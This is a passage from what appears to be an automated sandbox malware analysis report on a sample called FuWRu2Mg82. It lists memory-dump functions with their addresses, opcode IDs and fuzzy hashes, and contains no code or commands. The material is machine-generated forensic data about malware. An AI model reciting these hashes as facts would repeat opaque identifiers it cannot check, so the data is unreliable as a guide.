Instruction Fuzzy Hash: E131B371B0990A5BDB5CEB5CD4619A8F3A1FF95310B41523DD09EC3692CF24BD128B80

Function 00007FFD9C167685 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd41394620b912edccade86a874e82a54d9624f259f501fc59c1bc9665cad66
Instruction ID: db388351c4597ed3ad6f2f52f84e68e9eed65bcc50bfce331734cef41b906269
Opcode Fuzzy Hash: edd41394620b912edccade86a874e82a54d9624f259f501fc59c1bc9665cad66
Instruction Fuzzy Hash: 48315732E1C94B8FEBB9DB9885795BDB7B1FF44340F5001BAD01EE6191DB3868408B85

Function 00007FFD9C164AB3 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c75bc17d453bd6839e83196373d704f2f5ccb360048f8a0cc646c68c140a66
Instruction ID: 50b68440a90f6cc8d47df43acc581da2957a6d5da8d6eb2808089e4a543fb8d6
Opcode Fuzzy Hash: d1c75bc17d453bd6839e83196373d704f2f5ccb360048f8a0cc646c68c140a66
Instruction Fuzzy Hash: B4210923F1C58B4BEB69E7A899712A8B7F1EF45390F05017AE05EE32D3DD046806829C

Function 00007FFD9C166570 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d7643f3bed95c05a1255c3220395b12e4c4ec696cd705cc6c6a516809b18a1
Instruction ID: 8b842605deb9eaacd15dc455d1b3fddd99586b856ee6ce1e2ab771bbcbd74385
Opcode Fuzzy Hash: 16d7643f3bed95c05a1255c3220395b12e4c4ec696cd705cc6c6a516809b18a1
Instruction Fuzzy Hash: 47314912A1C5EB8AE73A835886755747BB1FF5134171842FAD09BDB4DBD83CB842C385

Function 00007FFD9BDDF3A0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4e1a7983f4c43e28b879a8ea96936606c0beb34e561f90497aa418cdbe55f1
Instruction ID: 35d107f53c0462c848263fc50a6cb62eef620def1523b7ea45cdcd1d49b1bec9
Opcode Fuzzy Hash: 7c4e1a7983f4c43e28b879a8ea96936606c0beb34e561f90497aa418cdbe55f1
Instruction Fuzzy Hash: 85313810A1E6EB4AE73D835884B45B47B51EFD631071A47BBC0DBCB8A7C82CB9819751

Function 00007FFD9BDD88B0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e25fa16577d4c0b82101ff02bb2e169ada66ac84960c327335426be1b9a83741
Instruction ID: 2825d339eaa23cef89b89b10cd5ce5b71f5b6cc420badd9e0c962ab1a8fa4fab
Opcode Fuzzy Hash: e25fa16577d4c0b82101ff02bb2e169ada66ac84960c327335426be1b9a83741
Instruction Fuzzy Hash: 23314C10A1D1AA8EE73F921448746747B61EFC1301B1967B6D4CBCB8EBC51DBB81C342

Function 00007FFD9BA10C25 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b24cc8a3ebd74e7d4fc8587a8633f702e9a36f46a0c2406e0a2f9f3576424b2
Instruction ID: 94195d0e2f143bf6252693e01bb3acd53372ced2bfb5f3959106bc33f1fcfe74
Opcode Fuzzy Hash: 0b24cc8a3ebd74e7d4fc8587a8633f702e9a36f46a0c2406e0a2f9f3576424b2
Instruction Fuzzy Hash: 18213136B0E29E8FE722A77898614DC7B70EF42320F0542F3D0598B1D3D939264A8B85

Function 00007FFD9C163972 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b455f6f90e9b8af63dd033548118e6f4e230f8a15e3c6e180da0364e0054646
Instruction ID: f2a276bf20e497c47e94726ad7ed62a386401d37267b2e0c7ebea423b12d6c3b
Opcode Fuzzy Hash: 9b455f6f90e9b8af63dd033548118e6f4e230f8a15e3c6e180da0364e0054646
Instruction Fuzzy Hash: D921D731A1891D9FDFA9EB58D4A5AEDB7B1FF6C300F4041BAD01EE3291CB35A9418B40

Function 00007FFD9BDDC7D2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573b7384b3ef039655c82c4e153b8f33ecaa38f00c9105d7af8c900445c8fffd
Instruction ID: f0b1d603e113dfd7589ab661e2aa56ede3c4920e5b9a0ea110d068f435cc8360
Opcode Fuzzy Hash: 573b7384b3ef039655c82c4e153b8f33ecaa38f00c9105d7af8c900445c8fffd
Instruction Fuzzy Hash: 7B21FB70B1591D9FDF9CDB58C465AECB3B1FFA8300F0542AAD44EE36A1CA35A9418B00

Function 00007FFD9BDD5CC2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5275faad5f1fd2e8efa9c12ffc12e75d469eb849c009f667d4d19ab02e0bc9c9
Instruction ID: 76a26f7912beef48b74f8db72d7bf1c0d45d154e2e342e1d6da1e0d2074e586d
Opcode Fuzzy Hash: 5275faad5f1fd2e8efa9c12ffc12e75d469eb849c009f667d4d19ab02e0bc9c9
Instruction Fuzzy Hash: 8021DA71A0991D9FDF9CDB58C4A5AE8B7F1FFA8304F4101AE944FE3691CA35A9818B40

Function 00007FFD9BDD88E0 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f13511b6bcc6aefe6154814985c796eb9a537d9f3d2ed82d61b367f3a865fb41
Instruction ID: 5050658bd8cfb9c0b120a58141ee76f42287cbf53226fa9429ae6d3e0af73860
Opcode Fuzzy Hash: f13511b6bcc6aefe6154814985c796eb9a537d9f3d2ed82d61b367f3a865fb41
Instruction Fuzzy Hash: 9D213E10B1D56B8FE73EA24484746B47761FFD0301B156BB9D0CB878DAC92DBB818742

Function 00007FFD9BA13F15 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f55eb990096b7c99d43cb2b806418ad355b65fb70f38e5e6e819012cff738ab
Instruction ID: 09a13947bbc005c1b7311f1ab63534275cc8eddcaa9a791d83c47ea82e6aa039
Opcode Fuzzy Hash: 0f55eb990096b7c99d43cb2b806418ad355b65fb70f38e5e6e819012cff738ab
Instruction Fuzzy Hash: 80213130A0D51D8FDBA8EB58C465BA973A1EB58304F1551BDC00ED32B4CE786A80CF81

Function 00007FFD9C165620 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b9ac364c77b13cf133349819555fbb080e4eb5f39ef61089ab62caaf1248110
Instruction ID: 7a7122029762bb52e470f8f1817d7eb033c5502cf7e725e18d2c0c9a28766954
Opcode Fuzzy Hash: 2b9ac364c77b13cf133349819555fbb080e4eb5f39ef61089ab62caaf1248110
Instruction Fuzzy Hash: 2E11E332B19A0B4EEB65FB64C5658F6B3E1EF55381B00063AD44EC35D3CF28B846C6A0

Function 00007FFD9BDDE450 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0227cefca44d071114f08fddca2097c331528b189f36ac135052e56efc733e
Instruction ID: c717d8d0d4954b82d255c87c440f92d79d8d504a12d7b37f3cccea0b267f00e0
Opcode Fuzzy Hash: 3e0227cefca44d071114f08fddca2097c331528b189f36ac135052e56efc733e
Instruction Fuzzy Hash: ED11C421B0AA0E4FDB69FB6480614F97391EF95314B01167AD48FC79E2CE28B9058790

Function 00007FFD9BDD7960 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 183e250a3789086bff3eb2d5e42e3eb603be58ace620473d3cd19ed9c73b97da
Instruction ID: b925bab87319435b642566b25cacc9ed7dfc082375313437db75511f2f17140f
Opcode Fuzzy Hash: 183e250a3789086bff3eb2d5e42e3eb603be58ace620473d3cd19ed9c73b97da
Instruction Fuzzy Hash: 8111E721B0AA0E4FDB69FB64C0619F973D1EF95301B41177AD48FC39E6DE28B9058790

Function 00007FFD9C16C54E Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bf8cfab67e9d40d55c25ae8703de318daee2e2c1f145f60d8781119dd7c143
Instruction ID: 5b42fe703a269256e5ac4d321f5d59f30958a38128bb58383a31183ff42804ea
Opcode Fuzzy Hash: 87bf8cfab67e9d40d55c25ae8703de318daee2e2c1f145f60d8781119dd7c143
Instruction Fuzzy Hash: D511F971B1991E8BDB9CEB58C565AEDB7B1EB58310F0001BED40EE3691DE2568408B40

Function 00007FFD9C16549E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ebacf0122a48a2e98562f0149ab412d2e645a1db605ca6d9cb4df56a6535a9
Instruction ID: 036c334b55ed59b557967d09ac5da066fdfb36f5d7e0ffc1d22c159a7f93445b
Opcode Fuzzy Hash: 01ebacf0122a48a2e98562f0149ab412d2e645a1db605ca6d9cb4df56a6535a9
Instruction Fuzzy Hash: 7E1189327096078FE715EE98D4396E573E1EF55395F04053BD90EC72D1CB25A841CBA0

Function 00007FFD9BDD77DE Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9a8858179195ab20f35d67dff90c4bd1689c78db28b880ea847586ff7cd2cd
Instruction ID: b4edc08398e87e8b68dc930bfada987552f527540cf0ead9b969b4bc7c1a9d7f
Opcode Fuzzy Hash: 9a9a8858179195ab20f35d67dff90c4bd1689c78db28b880ea847586ff7cd2cd
Instruction Fuzzy Hash: 93118E3270650B4FE71EAA58D4217E57391EF95315F01137BD44EC7AE1CB24A540C790

Function 00007FFD9BDDE2CE Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f25a5caeab0d09397a10750f9d328cfdc86365692358c62982a5b27e777b37b
Instruction ID: 42c1105334502459fcc1c2065db98a133148073886c24e29f342b8b58cf867b4
Opcode Fuzzy Hash: 0f25a5caeab0d09397a10750f9d328cfdc86365692358c62982a5b27e777b37b
Instruction Fuzzy Hash: AA11893170A50F8FEB29EA98D4216F57390EF95325F02173BD94EC7AE1CB28A9408790

Function 00007FFD9BA12739 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d56bacd5d56e409376b6c30a4b660221a0731aaa6155f51108352bac1e40efd
Instruction ID: bc22d74a8ed0fb10126d402da096cde2ec1db401b17be28dd11ea2362ac07d40
Opcode Fuzzy Hash: 4d56bacd5d56e409376b6c30a4b660221a0731aaa6155f51108352bac1e40efd
Instruction Fuzzy Hash: 1A119421F0D61E4FE7F4A79888647B97291FF58710F1620B9D44EE32F2EE68AE414A44

Function 00007FFD9BDD6E3E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc18b1b1beaea41718ee006b82b08177e5636b4be2e71f57571191bc468fff85
Instruction ID: 382c998c86ed89fbc5722d2c96e2b736ae08638e5a8d783ad62c1112f6a71196
Opcode Fuzzy Hash: dc18b1b1beaea41718ee006b82b08177e5636b4be2e71f57571191bc468fff85
Instruction Fuzzy Hash: 7B01D631F0EA4D4FEB59FBE894611EC7BA1EF89310F01527ED08AC3197DA2558428750

Function 00007FFD9BDD51B2 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59bf1fee65ca87a601edb4379dc2c340abc1677d82e8f5e2f2938c271d1a683c
Instruction ID: 3689851f3eab3aca7c857e3263bb1add9b913422dc4dd86a61027b9b4d2f45e4
Opcode Fuzzy Hash: 59bf1fee65ca87a601edb4379dc2c340abc1677d82e8f5e2f2938c271d1a683c
Instruction Fuzzy Hash: B011C534E1991E8FDB98EB88D860AACBBB1FF98304F511679D01EE3691CA356905CB10

Function 00007FFD9BA10C40 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3439e100d232dea7f1eba5fa3a576fcc872fbe455e1db7970c182547cdd8659
Instruction ID: 67344314e7bd3083854158e68c479147857691daf61092d7b87d866b3bb9667c
Opcode Fuzzy Hash: f3439e100d232dea7f1eba5fa3a576fcc872fbe455e1db7970c182547cdd8659
Instruction Fuzzy Hash: 1011A131B0E78D9FE762DBA8C86049D7FB0EF42710F0695F7C084DB1A2D97866498B85

Function 00007FFD9BDDC0BF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09103902ed5ab1d70a644da4b939733c51827a1d1a24d2750b37fa91d6d54645
Instruction ID: 394629bd91f9a2a4d8f361180191d9d8d421060cafa466d012865926a3cb4120
Opcode Fuzzy Hash: 09103902ed5ab1d70a644da4b939733c51827a1d1a24d2750b37fa91d6d54645
Instruction Fuzzy Hash: FDF0F431B0DA094FEB5CEE2898265B973D1FF89325F04013BD08EC36A6CE3168424781

Function 00007FFD9BA14107 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e497f878134d780101160dad35f506d432039e28bcfb9d390b27dc0a62e88f
Instruction ID: f05cc46a05c07972688bf30f310146bfcd18aee9c9f8207ac862eea037d4d19e
Opcode Fuzzy Hash: 14e497f878134d780101160dad35f506d432039e28bcfb9d390b27dc0a62e88f
Instruction Fuzzy Hash: B011F13090891D8FDBA8EB08C851BE9B3A1FB58305F1541EDD40ED32A4DA74AE85CF81

Function 00007FFD9BDD5B07 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dbbe98e12770180db218ff22c3f0c651d5d8027993344691e2c5a6d6500112e
Instruction ID: b0724aef4513dcbf99dcdb29558c9a6126ca94d79e1c578ebc665e2e2e929ae0
Opcode Fuzzy Hash: 9dbbe98e12770180db218ff22c3f0c651d5d8027993344691e2c5a6d6500112e
Instruction Fuzzy Hash: D9018A7090965D8FDFA8EF08C494FA877F1EB68301F1141AD904EE7691DA35AA80DF50

Function 00007FFD9C163C82 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97a81627e2e15f4d8fc2c4d148942bf2f471bdda3570b0057f484695dd52f23
Instruction ID: 13ab6778d4641c8fdc69cd529b64a2f3d0da635a661150b7820b9a67156990c4
Opcode Fuzzy Hash: f97a81627e2e15f4d8fc2c4d148942bf2f471bdda3570b0057f484695dd52f23
Instruction Fuzzy Hash: DCF0C23288E2CA9FE7128BB08D614E53FB0AF47354B1900F7E085D70A2C52D164AC761

Function 00007FFD9BDDCAE2 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636fa5c2da8dd62f1e40ebb90bdfbb5f679177194ed32785991f110038de2931
Instruction ID: dd341fb7ac6b91d8359422e3251aa0d42be725f0bf8d6ee0fbdf3a511f39a1c4
Opcode Fuzzy Hash: 636fa5c2da8dd62f1e40ebb90bdfbb5f679177194ed32785991f110038de2931
Instruction Fuzzy Hash: C7F0A43144F3C99FD716CBB088619A57FA4AF83200F1A02F6D0968B4A2D568564AC751

Function 00007FFD9C16C822 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d670e977a8241b9effa8781c8ff3fe9ddf86d78d0eaa979bb52cda40bf94b67a
Instruction ID: 4ae3b0b546bfa4fbf488f010ae641eacdd01d08df6c6e2889bef2c4d4c05cb46
Opcode Fuzzy Hash: d670e977a8241b9effa8781c8ff3fe9ddf86d78d0eaa979bb52cda40bf94b67a
Instruction Fuzzy Hash: F8F0C23284E2C69FD7228BF089B14E97FB8EF43240F1440FAD099D70A2C52D2526C752

Function 00007FFD9BA1286E Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd3e87665e6ed4fa70474c3bbdf959d211f7fc22e2bcfdaacc3a21eb3c266cb
Instruction ID: c9eb2db910358f478fe7dfc99492befe0566cfe867d9a97da8b338ff4e7ea817
Opcode Fuzzy Hash: 3fd3e87665e6ed4fa70474c3bbdf959d211f7fc22e2bcfdaacc3a21eb3c266cb
Instruction Fuzzy Hash: BFF04930E4951E8BEBB4EBD4CC64AF873A1FF54311F0211B9D44ED31B5DEA8AA818A40

Function 00007FFD9BA10B77 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c3d6cac6affc54cb58253a11a87b35ebd919be56d70b542220c11c36a64cb9
Instruction ID: d12f6c4730a5bad2d9a4bef743b1d53556a3d7aaac0347fd7f4537a465895cfa
Opcode Fuzzy Hash: 29c3d6cac6affc54cb58253a11a87b35ebd919be56d70b542220c11c36a64cb9
Instruction Fuzzy Hash: 76F0553660D64D8FD742AB7CDCA40E43F50EB43218B4A12FAD088C7162D110191DC700

Function 00007FFD9BA12844 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9098398f186bdafc066a0e9b9fdd75f86f932406c7a6e64d7c12059d1144759c
Instruction ID: ad6c132341f31c2e8bcee4d19363d5366f28f74473a69e1fbfa910801954f85a
Opcode Fuzzy Hash: 9098398f186bdafc066a0e9b9fdd75f86f932406c7a6e64d7c12059d1144759c
Instruction Fuzzy Hash: 67F09621B0D61D4BEAF4E784C8646F53391EF54310F1211B9D44ED32F2DD5CAE818984

Function 00007FFD9C1608B2 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1742060426.00007FFD9C160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9c160000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfcf009618fb07c1589264b539bf06df5329214fbc2f9f9325837ce34258071
Instruction ID: 6e5197d0e9b8386f3065620cf578199bb44d9a1e973506bd6bb45cb7863c967c
Opcode Fuzzy Hash: dbfcf009618fb07c1589264b539bf06df5329214fbc2f9f9325837ce34258071
Instruction Fuzzy Hash: 27E0C932E2950F8EEBA4DB9485216FDB774FF48390F900575D11EF2295DF2824508798

Function 00007FFD9BDDD7D7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b3b855035ab138921f593f6bce3da7a506926f1629ce3315b1d03e9a2a0b01
Instruction ID: 7eeac1151005b37c1df42c04c5b6ad498f69494dfdb8ab63de25c848ff660429
Opcode Fuzzy Hash: 13b3b855035ab138921f593f6bce3da7a506926f1629ce3315b1d03e9a2a0b01
Instruction Fuzzy Hash: 6BE08C42F0E2C61BEB2A02B8083027C2A909F5734470A23BAC08B8F5A3DA482A099351

Function 00007FFD9BDD5FFF Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737779564.00007FFD9BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bdd0000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01e73487bbd4718ad2f0913848331f1ca89f4bb1b32f79368822cc408487951
Instruction ID: ccedb100937fd0116e39f1d4223dc9e5a19d6adbd15e83ced0d1f8302cf0ffbd
Opcode Fuzzy Hash: c01e73487bbd4718ad2f0913848331f1ca89f4bb1b32f79368822cc408487951
Instruction Fuzzy Hash: F1D0A73491E28CD6EB3DDF9084114FD7B60FF80304F2016BAE94F43490CA382718A6C2

Function 00007FFD9BA106A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726910155.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba10000_FuWRu2Mg82.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ab185f2e75639a9f10cdec7fd424883d34716c1dc26064ee85cf9951f56a85
Instruction ID: 342b964bfa8ef1d5c5461eb990d609bd083fdbe28cc106cd4c6f0ab9677f8d93
Opcode Fuzzy Hash: b9ab185f2e75639a9f10cdec7fd424883d34716c1dc26064ee85cf9951f56a85
